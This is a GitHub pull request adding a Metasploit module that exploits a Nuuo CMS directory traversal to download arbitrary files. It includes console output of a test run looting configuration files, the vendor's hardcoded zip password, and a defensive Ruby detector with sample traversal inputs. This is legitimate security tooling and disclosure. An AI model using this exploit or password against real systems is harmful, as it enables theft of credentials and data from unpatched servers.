
Add exploit for Nuuo CMS arbitrary file download #11293

Merged
merged 15 commits into from Feb 20, 2019

Conversation


@pedrib pedrib commented Jan 21, 2019

This is the 4th and last exploit of the Nuuo CMS ownage.
This exploit allows an authenticated attacker to download any file off the system, including the Nuuo configuration files that contain the database password.

The exploit downloads these configuration files by default plus whatever the user specifies. Note that these configuration files are zip encrypted with a password, and at the moment there is no way to unzip them in msf.
I've added a note for the users to harass you to get it into the framework :P

This vulnerability has not been fixed by Nuuo, and it's still exploitable in the latest 3.5.0 version.

This module has been tested and is working for all versions of Nuuo CMS up to and including 3.5.0.
Please see more details in the full advisory at https://raw.githubusercontent.com/pedrib/PoC/master/advisories/nuuo-cms-ownage.txt

This exploit needs PR #11289

You can download current and earlier versions of Nuuo software at http://d1.nuuo.com/NUUO/CMS/

```ruby
they cannot be decrypted in Metasploit.")
print_status("#{peer} - You will need to open them up with zip or a similar utility, and use the \
password NUCMS2007! to unzip them.")
print_status("#{peer} - Annoy the Metasploit developers until this gets fixed!")
```
Contributor:

The Metasploit project accepts pull requests.

Contributor Author (pedrib):

so it's ok if I submit a PR including the 'archive/zip' gem? Last time I mentioned that I was told new gems would only be included in extreme cases.

Contributor:

A native Ruby solution would likely be preferred. Ideally, an update to the Rex::Archive library to support decryption.

Contributor Author (pedrib):

Sure but that would be pretty time consuming for a non professional developer like me, especially if there is a gem that already does it.


pedrib commented Jan 21, 2019

docs added!

@bcoles bcoles added docs and removed needs-docs labels Jan 21, 2019

pedrib commented Jan 24, 2019

Reverted changes...


pedrib commented Jan 30, 2019

Fixed a bug: if we gave the path to a bogus file and nil was returned, we would say all good. Now we just warn the user that nothing was downloaded and the file might not exist, or let him/her know the download was successful.

aux:nuuo_cms_file_download
@jrobles-r7

Tested on Windows 10 Pro x64 running NCS Server 2.4.0

```
msf5 auxiliary(gather/nuuo_cms_file_download) > set rhosts 172.22.222.200
rhosts => 172.22.222.200
msf5 auxiliary(gather/nuuo_cms_file_download) > exploit
[+] 172.22.222.200:5180 - Downloaded file to /home/msfdev/.msf4/loot/20190219064923_default_172.22.222.200_CMServer.cfg_227185.cfg
[+] 172.22.222.200:5180 - Downloaded file to /home/msfdev/.msf4/loot/20190219064923_default_172.22.222.200_ServerConfig.cfg_050084.cfg
[*] 172.22.222.200:5180 - The user and server configuration files were stored in the loot database.
[*] 172.22.222.200:5180 - The files are ZIP encrypted, and due to the lack of the archive/zip gem,
[*] 172.22.222.200:5180 - they cannot be decrypted in Metasploit.
[*] 172.22.222.200:5180 - You will need to open them up with zip or a similar utility, and use the
[*] 172.22.222.200:5180 - password NUCMS2007! to unzip them.
[*] 172.22.222.200:5180 - Annoy the Metasploit developers until this gets fixed!
[*] Auxiliary module execution completed
msf5 auxiliary(gather/nuuo_cms_file_download) >
```

@jrobles-r7 jrobles-r7 merged commit 1ab89a8 into rapid7:master Feb 20, 2019
jrobles-r7 added a commit that referenced this pull request Feb 20, 2019

jrobles-r7 commented Feb 20, 2019

Release Notes

The auxiliary/gather/nuuo_cms_file_download module has been added to the framework. This sends GETCONFIG requests to download configuration files from vulnerable NCS Server applications by exploiting a directory traversal vulnerability in the FileName header.
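The release note above describes a GETCONFIG request whose FileName header is abused for directory traversal. As an added example (not code from the Metasploit module, this pull request, or the NUUO software), the Ruby below shows the defender-side counterpart: an allowlist-based resolver that keeps a client-supplied file name inside a fixed configuration directory, and a detector that flags request log lines whose FileName value looks like traversal or names a file the endpoint was never meant to serve. The request-line layout, the CONFIG_ROOT directory and the ALLOWED_CONFIG_FILES list are assumptions made for this example; the real NCS Server wire format is not shown on this page. The two allowlisted names are simply the files shown as downloaded in the test output earlier in this thread.

```ruby
require 'pathname'
require 'uri'

# Assumed base directory where the server keeps its configuration files (hypothetical).
CONFIG_ROOT = '/opt/ncs/config'.freeze
# Assumed allowlist of the only names the download endpoint should serve; the two
# names are the files shown as downloaded in the test output earlier in this thread.
ALLOWED_CONFIG_FILES = %w[CMServer.cfg ServerConfig.cfg].freeze

# Constructed request log lines in a made-up "VERB Header: value" layout.
SAMPLE_REQUESTS = [
  'GETCONFIG FileName: CMServer.cfg',
  'GETCONFIG FileName: ServerConfig.cfg',
  'GETCONFIG FileName: ../../secret.txt',
  'GETCONFIG FileName: ..\\..\\secret.txt',
  'GETCONFIG FileName: %2e%2e/%2e%2e/secret.txt',
  'GETCONFIG FileName: /abs/secret.txt',
  'GETCONFIG FileName: other.cfg'
].freeze

# Pull the FileName header value out of one request line; nil if the line has none.
def extract_file_name(line)
  m = line.match(/FileName:\s*(\S+)/i)
  m && m[1]
end

# Decode one layer of percent-encoding; invalid escapes are left untouched.
def percent_decode(value)
  URI.decode_www_form_component(value)
rescue ArgumentError
  value
end

# Detection heuristic: does the value try to escape the directory it was meant
# to stay in? Checks NUL bytes, absolute paths (POSIX, UNC or drive letter) and
# any ".." path segment, with either separator.
def traversal?(value)
  decoded = percent_decode(value.to_s)
  return true if decoded.include?("\0")
  return true if decoded.start_with?('/', '\\') || decoded.match?(/\A[A-Za-z]:/)
  decoded.split(%r{[\\/]}).include?('..')
end

# Server-side mitigation: serve only allowlisted names, resolve them under the
# root, and re-check containment after normalisation. Returns nil on any doubt.
def resolve_config_path(file_name, root: CONFIG_ROOT, allowed: ALLOWED_CONFIG_FILES)
  return nil unless allowed.include?(file_name)
  root_path = Pathname.new(root).cleanpath
  candidate = (root_path + file_name).cleanpath
  candidate.to_s.start_with?(root_path.to_s + File::SEPARATOR) ? candidate.to_s : nil
end

# Log-side detection: return the request lines whose FileName is traversal-like
# or simply not one of the files the endpoint is expected to serve.
def suspicious_requests(lines, allowed: ALLOWED_CONFIG_FILES)
  lines.select do |line|
    name = extract_file_name(line)
    next false if name.nil?
    traversal?(name) || !allowed.include?(name)
  end
end

if $PROGRAM_NAME == __FILE__
  suspicious_requests(SAMPLE_REQUESTS).each { |line| puts "ALERT: #{line}" }
  puts "resolved: #{resolve_config_path('CMServer.cfg').inspect}"
end
```

The resolver deliberately does not try to "clean" a bad name into a good one: anything not on the allowlist is refused outright, and the containment check after `cleanpath` is defence in depth rather than the primary control. The detector errs toward noise, flagging any name outside the allowlist, which is the right bias for an endpoint that should only ever hand out two files.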


pedrib commented Feb 20, 2019

tested on 2.9, working!

@pedrib pedrib deleted the nuuo_cms_fdl branch February 20, 2019 17:20
msjenkins-r7 pushed a commit that referenced this pull request Feb 20, 2019
@gdavidson-r7 gdavidson-r7 added the rn-enhancement release notes enhancement label Mar 5, 2019